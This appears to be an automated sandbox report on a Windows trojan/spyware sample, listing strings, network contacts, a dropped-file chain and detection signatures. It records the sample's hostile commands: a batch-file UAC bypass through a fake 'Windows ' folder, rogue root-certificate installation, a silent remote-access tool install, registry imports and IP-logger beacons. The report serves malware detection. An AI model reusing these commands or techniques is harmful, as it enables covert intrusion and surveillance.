Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp String found in binary or memory: https://iplogger.org/1tncg7r
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp String found in binary or memory: https://iplogger.org/1tsTg7
Source: 1wOdXavtlE.exe, 00000002.00000002.483173141.0000000001111000.00000004.00000020.sdmp String found in binary or memory: https://iplogger.org/1tsTg78
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp String found in binary or memory: https://iplogger.org/1tsTg7Z
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp String found in binary or memory: https://wtfismyip.com/text
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: ssevs.exe, 00000016.00000002.482511545.0000000001458000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Drops certificate files (DER)
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File created: C:\ProgramData\Immunity\CertMgry\is-I14BP.tmp

System Summary:

Uses regedit.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 17_2_004A0E24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 19_2_005ECBC0
Creates files inside the system directory
Source: C:\Windows\System32\cmd.exe File created: C:\Windows
Detected potential crypto function
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_00007FF7D9F53D48 23_2_00007FF7D9F53D48
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: String function: 005EA59C appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: String function: 005BC3D8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: String function: 005D3750 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: String function: 005F3814 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: String function: 005D3A34 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: String function: 005F3590 appears 39 times
PE file contains executable resources (Code or Archives)
Source: servs.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: servs.tmp.17.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
PE file contains more sections than normal
Source: is-PFD3D.tmp.19.dr Static PE information: Number of sections : 17 > 10
PE file contains strange resources
Source: 1wOdXavtlE.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: servs.tmp.17.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMetroFramework.dll> vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.348986565.00000000028F2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000000.322469152.000000000036B000.00000002.00020000.sdmp Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameIEFRAME.DLL.MUID vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.482401861.0000000001030000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp Binary or memory string: OriginalFilename6Qgb9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532430822.00000000087F0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530971740.00000000080C0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.477691078.000000000080B000.00000002.00020000.sdmp Binary or memory string: OriginalFilename~ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.492060863.0000000003C24000.00000004.00000001.sdmp Binary or memory string: OriginalFilename9 vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.530783769.0000000007F50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 1wOdXavtlE.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.476252478.0000000000418000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameSynchronal.exe4 vs 1wOdXavtlE.exe
Uses 32bit PE files
Source: 1wOdXavtlE.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 1wOdXavtlE.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.1wOdXavtlE.exe.400000.0.unpack, BrowserExtension/Data/Crypto/CryptoHelper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@50/66@28/9
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004A0E24 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 17_2_004A0E24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_005ECBC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 19_2_005ECBC0
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0041A5FC GetDiskFreeSpaceW, 17_2_0041A5FC
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_00601290 GetVersion,CoCreateInstance, 19_2_00601290
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004A16FC FindResourceW,SizeofResource,LoadResource,LockResource, 17_2_004A16FC
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1wOdXavtlE.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\ProgramData\Immunity\rutserv.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$694
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_01
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File created: C:\Users\user\AppData\Local\Temp\tmp379E.tmp
Source: Yara match File source: 00000025.00000002.549143519.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.508478042.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Immunity\is-2SOD7.tmp, type: DROPPED
Source: Yara match File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: 1wOdXavtlE.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\servs.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\pass.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Immunity\rutserv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 1wOdXavtlE.exe Metadefender: Detection: 16%
Source: 1wOdXavtlE.exe ReversingLabs: Detection: 58%
Source: servs.exe String found in binary or memory: rting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked the co
Source: unknown Process created: C:\Users\user\Desktop\1wOdXavtlE.exe 'C:\Users\user\Desktop\1wOdXavtlE.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\servs.exe Process created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Process created: C:\ProgramData\pass.exe C:\ProgramData\pass.exe
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Source: C:\ProgramData\pass.exe Process created: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp 'C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp' /SL5='$10584,9506241,724480,C:\ProgramData\pass.exe'
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'regedit /s C:\ProgramData\Immunity\ses.reg'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\Immunity\install.cmd''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 1wOdXavtlE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 1wOdXavtlE.exe Static file information: File size 1285632 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 1wOdXavtlE.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source: Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
.NET source code contains potential unpacker
Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs .Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs .Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs .Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs .Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs .Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
PE file contains an invalid checksum
Source: is-PFD3D.tmp.19.dr Static PE information: real checksum: 0xc2cd should be: 0x193fb
Source: 1wOdXavtlE.exe Static PE information: real checksum: 0x0 should be: 0x13dc3c
Source: servs.tmp.17.dr Static PE information: real checksum: 0x0 should be: 0x271505
Source: is-R3F67.tmp.19.dr Static PE information: real checksum: 0x0 should be: 0x9c1fa0
PE file contains sections with non-standard names
Source: servs.tmp.17.dr Static PE information: section name: .didata
Source: is-PFD3D.tmp.19.dr Static PE information: section name: .xdata
Source: is-PFD3D.tmp.19.dr Static PE information: section name: /4
Source: is-PFD3D.tmp.19.dr Static PE information: section name: /19
Source: is-PFD3D.tmp.19.dr Static PE information: section name: /31
Source: is-PFD3D.tmp.19.dr Static PE information: section name: /45
Source: is-PFD3D.tmp.19.dr Static PE information: section name: /57
Source: is-PFD3D.tmp.19.dr Static PE information: section name: /70
Source: is-R3F67.tmp.19.dr Static PE information: section name: .didata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Code function: 0_2_00D4CA14 push esp; retn 0278h 0_2_00D4CA21
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Code function: 0_2_04DC0400 push ecx; ret 0_2_04DC0415
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Code function: 0_2_04DC65A0 pushfd ; retf 0_2_04DC65A1
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004A7000 push 004A70DEh; ret 17_2_004A70D6
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004A7980 push 004A7A43h; ret 17_2_004A7A3B
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0043007C push ecx; mov dword ptr [esp], eax 17_2_0043007D
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004990DC push ecx; mov dword ptr [esp], edx 17_2_004990DD
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0045608C push ecx; mov dword ptr [esp], ecx 17_2_00456090
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00430094 push ecx; mov dword ptr [esp], eax 17_2_00430095
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00498140 push ecx; mov dword ptr [esp], edx 17_2_00498141
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0045A16C push ecx; mov dword ptr [esp], edx 17_2_0045A16D
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0045410C push 00454162h; ret 17_2_0045415A
